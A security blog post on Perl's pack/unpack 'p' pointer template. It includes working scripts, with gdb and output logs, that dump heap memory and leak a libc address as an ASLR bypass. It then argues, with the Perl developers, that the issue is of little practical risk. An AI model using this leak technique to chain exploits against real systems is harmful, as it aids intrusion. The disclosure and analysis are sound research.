Perl, like many other languages provides pack()/unpack() functions which allow data to be converted to/from raw binary representations. For instance, running…
printf("%s", pack("L",0x41424344));
…will print DCBA. The first argument is a template and specifies how to pack or unpack the data. For example in the snippet above, the “L” signifies an unsigned long. For the most part these functions are implemented as you would expect, however Perl adds an additional template not present in any other language I’ve ever seen: the “p/P” template. According to the Perl documentation, this template specifies a pointer. [1] Yes, you read that right, a pointer. It’s suppose to work like this…
$a = pack("p", "testing testing 123"); # prints 0xNNNNNNNN (raw pointer to the string) printf("0x%08x", unpack("L", $a)); # prints "testing testing 123" printf("%s", unpack("p", $a));
But if we can control the pointer itself, what else could we read? Let’s try unpack()’ing an arbitrary pointer using the “p” template…
andrew@WOPR ~ % gdb -q perl Reading symbols from perl...(no debugging symbols found)...done. (gdb) r -e 'print unpack("p","AAAAAAAA");' Starting program: /usr/bin/perl -e 'print unpack("p","AAAAAAAA");' [Thread debugging using libthread_db enabled] Using host libthread_db library "/usr/lib/libthread_db.so.1". Program received signal SIGSEGV, Segmentation fault. 0x00007ffff76c5d76 in strlen () from /usr/lib/libc.so.6 (gdb) x/1i $rip => 0x7ffff76c5d76: movdqu (%rax),%xmm4 (gdb) i r $rax rax 0x4141414141414141 4702111234474983745 (gdb) bt #0 0x00007ffff76c5d76 in strlen () from /usr/lib/libc.so.6 #1 0x00007ffff7ad8583 in Perl_newSVpv () from /usr/lib/perl5/core_perl/CORE/libperl.so #2 0x00007ffff7b553a2 in S_unpack_rec () from /usr/lib/perl5/core_perl/CORE/libperl.so #3 0x00007ffff7b57708 in Perl_unpackstring () from /usr/lib/perl5/core_perl/CORE/libperl.so #4 0x00007ffff7b578e6 in Perl_pp_unpack () from /usr/lib/perl5/core_perl/CORE/libperl.so #5 0x00007ffff7abb2c6 in Perl_runops_standard () from /usr/lib/perl5/core_perl/CORE/libperl.so #6 0x00007ffff7a43379 in perl_run () from /usr/lib/perl5/core_perl/CORE/libperl.so #7 0x0000000000400e29 in main () (gdb)
There you have it. Perl is attempting to read from a completely controllable address. This can be leveraged to leak the entire contents of memory. Let’s do that. The following script will leak memory off the heap until it falls off the page. This could be easily modified to keep leaking the next page(s) too, but I didn’t add that logic.
#!/usr/bin/perl use Time::HiRes; $row_width = 16; $print_throttle = 10000; $str = "whatever"; # put something on the heap $ptr = unpack(Q,pack(p,$str)); # get a real pointer to it $str2 = "TESTING"; for(;;$ptr+=$row_width) { # print the address printf("0x%016x | ", $ptr); # print $row_width hex bytes for($c=0; $c<$row_width; $c++) { $a = unpack(p,pack(Q,$ptr+$c)); # string $a = substr($a,0,1); # single byte printf("%02x ", ord($a)); } print "| "; # print real bytes for($c=0; $c<$row_width; $c++) { $a = unpack(p,pack(Q,$ptr+$c)); # string $a = substr($a,0,1); # single byte # only print ascii if(ord($a) >= 0x20 && ord($a) <= 0x7e) { printf("%c", ord($a)); } else { printf("."); } } printf(" |\n"); # sleep just a moment so we dont spam stdout Time::HiRes::usleep($print_throttle); }
Try it yourself! You should see something like this…
andrew@WOPR ~ % /tmp/leak.pl 0x0000000001895dc0 | 77 68 61 74 65 76 65 72 00 01 87 01 00 00 00 00 | whatever........ | 0x0000000001895dd0 | b8 91 87 01 00 00 00 00 21 00 00 00 00 00 00 00 | ........!....... | 0x0000000001895de0 | 90 5d 89 01 00 00 00 00 28 c1 87 01 00 00 00 00 | .]......(....... | 0x0000000001895df0 | 00 00 00 00 00 00 00 00 41 00 00 00 00 00 00 00 | ........A....... | 0x0000000001895e00 | 00 00 00 00 00 00 00 00 18 5e 89 01 00 00 00 00 | .........^...... | 0x0000000001895e10 | 02 00 00 00 00 00 00 00 97 c6 ad 70 08 00 00 00 | ...........p.... | 0x0000000001895e20 | 50 65 72 6c 49 4f 3a 3a 00 00 00 00 00 00 00 00 | PerlIO::........ | 0x0000000001895e30 | 00 00 00 00 00 00 00 00 61 00 00 00 00 00 00 00 | ........a....... | 0x0000000001895e40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ | 0x0000000001895e50 | 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 | ................ | 0x0000000001895e60 | 70 c1 87 01 00 00 00 00 00 00 00 00 00 00 00 00 | p............... | 0x0000000001895e70 | 00 00 00 00 00 00 00 00 58 c1 87 01 00 00 00 00 | ........X....... | 0x0000000001895e80 | 00 00 00 00 00 00 00 00 b8 5e 89 01 00 00 00 00 | .........^...... | 0x0000000001895e90 | 00 00 00 00 00 00 00 00 41 00 00 00 00 00 00 00 | ........A....... | 0x0000000001895ea0 | 00 00 00 00 00 00 00 00 b8 5e 89 01 00 00 00 00 | .........^...... | 0x0000000001895eb0 | 5d 00 00 00 00 00 00 00 2d d7 2b 1b 0c 00 00 00 | ].......-.+..... | 0x0000000001895ec0 | 2f 74 6d 70 2f 6c 65 61 6b 2e 70 6c 00 00 00 00 | /tmp/leak.pl.... | 0x0000000001895ed0 | 00 00 00 00 00 00 00 00 41 00 00 00 00 00 00 00 | ........A....... | 0x0000000001895ee0 | 00 00 00 00 00 00 00 00 60 6a 03 bb 4a 7f 00 00 | ........`j..J... | ... etc ...
But we can do better! Even though memory leaks like this don’t give direct code execution, they are extremely useful when combined with another more serious bug, because they provide an easy ASLR bypass. If we can read pointers from memory, we can calculate exactly where code is located. Astute readers may have noticed that the last 8 bytes of the last line above are a pointer to a shared library: 0x00007f4abb036a60 (little-endian reversed of course). All we need to do is predict the relative location of a useful pointer (such as one in libc), and snag it. That turns out to be fairly easy. Observe…
#!/usr/bin/perl # this code is tuned for 64bit and will crash on 32bit # but there's no reason it wouldn't work there too # would just take a little modification / heap grooming # by whatever random chance, this broken IO puts a libc # pointer in just the right place on the heap. *shrug* open(DERP, "</etc/passwd"); while(<DERP>){}; $libc = 0x0; $str = "whatever"; # put something on the heap $ptr = unpack(Q,pack(p,$str)); # get a real pointer to it $ptr = $ptr + 8; # the libc ptr is just past it for($c=0;$c<8;$c++) { # read 8 bytes and lay them over $libc $byte = substr(unpack(p,pack(Q,$ptr+$c)),0,1); $libc += ord($byte) << ($c * 8); } # the libc base is either at $libc-0x394100 or $libc-0x38c100 # we can't be sure which, but either way the memory is readable # so we just look for \x7fELF and choose the one that has it :) # 0x156 == '\x7f' + 'E' + 'L' + 'F' $header_sum = 0; for($c=0;$c<4;$c++) { $byte = substr(unpack(p,pack(Q,$libc-0x38c100+$c)),0,1); $header_sum += ord($byte); } if($header_sum == 0x156) { $libc -= 0x38c100; } else { $libc -= 0x394100; } printf("LEAKED: libc @ 0x%012x\n", $libc); printf("Checking with /proc/self/maps to make sure...\n"); open(FILE, "</proc/self/maps"); while(<FILE>) { if(/libc-/) { print "$_"; } }
I’ve only tested this code on a few systems (Arch and Debian), but it worked nicely on both. Your millage may vary. If all goes well, you should see…
andrew@WOPR ~ % /tmp/aslr_bypass.pl LEAKED: libc @ 0x7ffac762c000 Checking with /proc/self/maps to make sure... 7ffac762c000-7ffac77c3000 r-xp 00000000 fe:01 4862344 /usr/lib/libc-2.23.so 7ffac77c3000-7ffac79c3000 ---p 00197000 fe:01 4862344 /usr/lib/libc-2.23.so 7ffac79c3000-7ffac79c7000 r--p 00197000 fe:01 4862344 /usr/lib/libc-2.23.so 7ffac79c7000-7ffac79c9000 rw-p 0019b000 fe:01 4862344 /usr/lib/libc-2.23.so
All of that being the case, is this a serious security concern? Probably not, no. To be fair, I can’t think of a situation in which it would pose a real threat, but I still find it shocking and bizarre. When I mentioned it to the development team they stated stated:
“It’s as ugly as hell, but there may be people still using it, which is why we’re reluctant to get rid of it. The question is whether it represents any sort of security issue. I can’t currently see that it does.”Since any sort of “exploit” for this issue requires the ability to run arbitrary Perl anyway, I tend to agree. An attacker who can run code already could just as easily read /proc/self/mem, or do any number of much more malicious things. Even a malicious script uploaded to a webserver wouldn’t need an exploit, since Perl does not offer the same “safe mode” functionality that similar languages like PHP do. Any attacker who can run unpack() can already do far worse.
Regardless, it seems wrong to me that interpreted code should be allowed to access memory directly. Is that not one of the core advantages of an interpreted language; to keep the code from doing dangerous things with memory? Maybe this doesn’t pose a threat, but at the very least I’ll agree with the “ugly as hell” sentiment.
That said, if anyone can think of a situation in which this IS highly dangerous I’d love to hear about it. Feel free to comment below or send me a message directly. Until then we can just categorize this as “LOL”, and move on. :)
[1]. http://perldoc.perl.org/functions/pack.html